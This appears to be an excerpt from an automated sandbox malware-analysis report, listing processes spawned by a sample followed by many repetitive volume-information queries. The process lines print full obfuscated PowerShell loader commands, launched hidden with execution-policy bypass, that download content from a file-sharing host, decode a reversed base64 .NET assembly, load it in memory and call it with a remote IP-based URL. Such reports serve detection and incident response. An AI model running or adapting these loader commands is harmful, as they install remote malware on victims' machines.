'kcdecdnpbwfnzvvybca9ieyxbwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9micrj0fhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygrjfto0rwm3dljysnyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7rhazaw1hz2vcexrlcya9ierwm3dlyknsawvudccrjy5eb3cnkydubg9hzerhdgeorhazaw1hzycrj2vvcicrj2wpo0rwm2ltywdlvgv4jysndca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkerwm2ltywdlqnl0zxmpo0rwm3n0yxj0rmxhzya9ieyxbtwnkyc8qkftrty0x1nuqvjupj5gmw0nkyc7rhazzw5krmxhzya9ieyxbtw8qkftrty0x0vord4+rjfto0rwm3n0yxj0sscrj25kzxggpsbecdnpbwfnzvrlehqusw5kzxhpzihecdnzdgfydezsywcpo0rwm2vuzeluzgunkyd4id0grhazaw1hz2vuzxh0lkluzgv4t2yorhazzw4nkydkjysnrmxhzyk7rhazc3rhcnrjbmrlecatjysnz2ugmcatyw5kierwm2vuzeluzgv4ic1njysndcbecdnzdgfydeluzgv4o0rwm3n0yxj0sw5kzxggkz0grhazc3rhcnqnkydgjysnbgfnlkxlbmd0adtecdniyxnlnjrmzw5ndgggpsbecdnlbmrjbmrlecatierwm3n0yxj0sw5kzxg7rhazymfzjysnzty0q29tbwfuzca9ierwm2ltywdlvgv4dc5tdwjzdhjpbmcorhazc3rhcnrjbmrlecwgrhazymfzzty0tgvuz3rokttecdniyxnlnjrszxzlcicrj3nlzca9ic1qb2luichecdniyxnlnjrdb21tyw5kllrvq2gnkydhckfyjysncmf5kckgntl0iezvckvhy2gtt2jqzwn0ihsgrhazxyb9kvstms4ulscrjyhecdniyxnlnjrdb21tyscrj25klkxlbmd0acldo0rwm2nvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbicrj2cojysnrhazyicrj2fzzty0umv2zxjzzwqpo0rwm2xvywqnkydlzefzc2vtymx5id0gw1n5c3rlbs5szwzszscrj2n0aw9ulkfzc2vtymx5xscrjzo6tg9hzchecdnjb21tyw5kqnl0zxmpo0rwm3zhau1ldghvzccrjya9jysniftkjysnbmxpyi5jty5ib21lxs5hzxrnzxrob2qorjftvkfjrjftkttecdn2ywlnzxrob2qusw52bycrj2tlkerwm251bgwsieaorjftdhh0lkzsrkzsvy8yntmvmzeumjiumy4yotevlzpwdhrorjftlcbgmw1kzxnhdgl2ywrvrjftlcbgjysnmw1kzxnhdgl2ywrvrjftlcbgmw1kzxnhdgl2ywrvrjftlcbgmw1bzgrjblankydyb2nlc3mzjysnmkyxbswgrjftzgvzyxrpdmfkb0yxbswgrjftzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftleyxbwrlc2f0axzhzg9gmscrj20srjftjysnzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftlccrj0yxbwrlc2f0axzhzg9gmw0srjftmuyxbsxgmw1kzxnhdgl2ywrvrjftksk7jykuukvwbgfjzsgow2noyvjdnzarw2noyvjdndkrw2noyvjdmta5ksxbc1rssu5nxvtjagfsxtm5ks5srxbsywnlkchby2hhul02octby2hhul0xmtirw2noyvjdnteplcckjykuukvwbgfjzsgow2noyvjdntmrw2noyvjdntcrw2noyvjdmte2ksxbc1rssu5nxvtjagfsxteyncl8ic4okedldc1wqvjjywjmrsankm1kcionks5oyw1lwzmsmtesml0tsm9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('dp3imageurl = f1mhttps://1017.filemail.com/api/file/get?filekey=2'+'aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f f1m;dp3we'+'bclient = new-object system.net.webclient;dp3imagebytes = dp3webclient'+'.dow'+'nloaddata(dp3imag'+'eur'+'l);dp3imagetex'+'t = [system.text.encoding]::utf8.getstring(dp3imagebytes);dp3startflag = f1m<'+'<base64_start>>f1m'+';dp3endflag = f1m<<base64_end>>f1m;dp3starti'+'ndex = dp3imagetext.indexof(dp3startflag);dp3endinde'+'x = dp3imagetext.indexof(dp3en'+'d'+'flag);dp3startindex -'+'ge 0 -and dp3endindex -g'+'t dp3startindex;dp3startindex += dp3start'+'f'+'lag.length;dp3base64length = dp3endindex - dp3startindex;dp3bas'+'e64command = dp3imagetext.substring(dp3startindex, dp3base64length);dp3base64rever'+'sed = -join (dp3base64command.toch'+'arar'+'ray() 59t foreach-object { dp3_ })[-1..-'+'(dp3base64comma'+'nd.length)];dp3commandbytes = [system.convert]::frombase64strin'+'g('+'dp3b'+'ase64reversed);dp3load'+'edassembly = [system.refle'+'ction.assembly]'+'::load(dp3commandbytes);dp3vaimethod'+' ='+' [d'+'nlib.io.home].getmethod(f1mvaif1m);dp3vaimethod.invo'+'ke(dp3null, @(f1mtxt.frffrw/253/31.22.3.291//:ptthf1m, f1mdesativadof1m, f'+'1mdesativadof1m, f1mdesativadof1m, f1maddinp'+'rocess3'+'2f1m, f1mdesativadof1m, f1mdesativadof1m,f1mdesativadof1m,f1mdesativadof1'+'m,f1m'+'desativadof1m,f1mdesativadof1m,'+'f1mdesativadof1m,f1m1f1m,f1mdesativadof1m));').replace(([char]70+[char]49+[char]109),[string][char]39).replace(([char]68+[char]112+[char]51),'$').replace(([char]53+[char]57+[char]116),[string][char]124)\| .((get-variable 'mdr').name[3,11,2]-join'')"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgsgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurklxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtqmvyrevgaw5jvglvbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkq2jwy2n4dvfrbsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjek1tlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifppdmrucfysdwludcagicagicagicagicagicagicagicagicagicagicagigzveuzic2dozsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbrvu96sgnmbhp5ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaizgzciiagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq2ugicagicagicagicagicagicagicagicagicagicagicbiu2jmb1zwbiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakazo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiyljezl3hhbxbwl3nll3nlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2l0agdyzwf0dghpbmdzd2l0agxvdmvya2lzcy50suyilcikrw5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtiiwwldapo1nuyvj0lxnszuvwkdmpo2lfecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtig=='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdecdnpbwfnzvvybca9ieyxbwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9micrj0fhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygrjfto0rwm3dljysnyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7rhazaw1hz2vcexrlcya9ierwm3dlyknsawvudccrjy5eb3cnkydubg9hzerhdgeorhazaw1hzycrj2vvcicrj2wpo0rwm2ltywdlvgv4jysndca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkerwm2ltywdlqnl0zxmpo0rwm3n0yxj0rmxhzya9ieyxbtwnkyc8qkftrty0x1nuqvjupj5gmw0nkyc7rhazzw5krmxhzya9ieyxbtw8qkftrty0x0vord4+rjfto0rwm3n0yxj0sscrj25kzxggpsbecdnpbwfnzvrlehqusw5kzxhpzihecdnzdgfydezsywcpo0rwm2vuzeluzgunkyd4id0grhazaw1hz2vuzxh0lkluzgv4t2yorhazzw4nkydkjysnrmxhzyk7rhazc3rhcnrjbmrlecatjysnz2ugmcatyw5kierwm2vuzeluzgv4ic1njysndcbecdnzdgfydeluzgv4o0rwm3n0yxj0sw5kzxggkz0grhazc3rhcnqnkydgjysnbgfnlkxlbmd0adtecdniyxnlnjrmzw5ndgggpsbecdnlbmrjbmrlecatierwm3n0yxj0sw5kzxg7rhazymfzjysnzty0q29tbwfuzca9ierwm2ltywdlvgv4dc5tdwjzdhjpbmcorhazc3rhcnrjbmrlecwgrhazymfzzty0tgvuz3rokttecdniyxnlnjrszxzlcicrj3nlzca9ic1qb2luichecdniyxnlnjrdb21tyw5kllrvq2gnkydhckfyjysncmf5kckgntl0iezvckvhy2gtt2jqzwn0ihsgrhazxyb9kvstms4ulscrjyhecdniyxnlnjrdb21tyscrj25klkxlbmd0acldo0rwm2nvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbicrj2cojysnrhazyicrj2fzzty0umv2zxjzzwqpo0rwm2xvywqnkydlzefzc2vtymx5id0gw1n5c3rlbs5szwzszscrj2n0aw9ulkfzc2vtymx5xscrjzo6tg9hzchecdnjb21tyw5kqnl0zxmpo0rwm3zhau1ldghvzccrjya9jysniftkjysnbmxpyi5jty5ib21lxs5hzxrnzxrob2qorjftvkfjrjftkttecdn2ywlnzxrob2qusw52bycrj2tlkerwm251bgwsieaorjftdhh0lkzsrkzsvy8yntmvmzeumjiumy4yotevlzpwdhrorjftlcbgmw1kzxnhdgl2ywrvrjftlcbgjysnmw1kzxnhdgl2ywrvrjftlcbgmw1kzxnhdgl2ywrvrjftlcbgmw1bzgrjblankydyb2nlc3mzjysnmkyxbswgrjftzgvzyxrpdmfkb0yxbswgrjftzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftleyxbwrlc2f0axzhzg9gmscrj20srjftjysnzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftlccrj0yxbwrlc2f0axzhzg9gmw0srjftmuyxbsxgmw1kzxnhdgl2ywrvrjftksk7jykuukvwbgfjzsgow2noyvjdnzarw2noyvjdndkrw2noyvjdmta5ksxbc1rssu5nxvtjagfsxtm5ks5srxbsywnlkchby2hhul02octby2hhul0xmtirw2noyvjdnteplcckjykuukvwbgfjzsgow2noyvjdntmrw2noyvjdntcrw2noyvjdmte2ksxbc1rssu5nxvtjagfsxteyncl8ic4okedldc1wqvjjywjmrsankm1kcionks5oyw1lwzmsmtesml0tsm9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('dp3imageurl = f1mhttps://1017.filemail.com/api/file/get?filekey=2'+'aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f f1m;dp3we'+'bclient = new-object system.net.webclient;dp3imagebytes = dp3webclient'+'.dow'+'nloaddata(dp3imag'+'eur'+'l);dp3imagetex'+'t = [system.text.encoding]::utf8.getstring(dp3imagebytes);dp3startflag = f1m<'+'<base64_start>>f1m'+';dp3endflag = f1m<<base64_end>>f1m;dp3starti'+'ndex = dp3imagetext.indexof(dp3startflag);dp3endinde'+'x = dp3imagetext.indexof(dp3en'+'d'+'flag);dp3startindex -'+'ge 0 -and dp3endindex -g'+'t dp3startindex;dp3startindex += dp3start'+'f'+'lag.length;dp3base64length = dp3endindex - dp3startindex;dp3bas'+'e64command = dp3imagetext.substring(dp3startindex, dp3base64length);dp3base64rever'+'sed = -join (dp3base64command.toch'+'arar'+'ray() 59t foreach-object { dp3_ })[-1..-'+'(dp3base64comma'+'nd.length)];dp3commandbytes = [system.convert]::frombase64strin'+'g('+'dp3b'+'ase64reversed);dp3load'+'edassembly = [system.refle'+'ction.assembly]'+'::load(dp3commandbytes);dp3vaimethod'+' ='+' [d'+'nlib.io.home].getmethod(f1mvaif1m);dp3vaimethod.invo'+'ke(dp3null, @(f1mtxt.frffrw/253/31.22.3.291//:ptthf1m, f1mdesativadof1m, f'+'1mdesativadof1m, f1mdesativadof1m, f1maddinp'+'rocess3'+'2f1m, f1mdesativadof1m, f1mdesativadof1m,f1mdesativadof1m,f1mdesativadof1'+'m,f1m'+'desativadof1m,f1mdesativadof1m,'+'f1mdesativadof1m,f1m1f1m,f1mdesativadof1m));').replace(([char]70+[char]49+[char]109),[string][char]39).replace(([char]68+[char]112+[char]51),'$').replace(([char]53+[char]57+[char]116),[string][char]124)\| .((get-variable 'mdr').name[3,11,2]-join'')"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
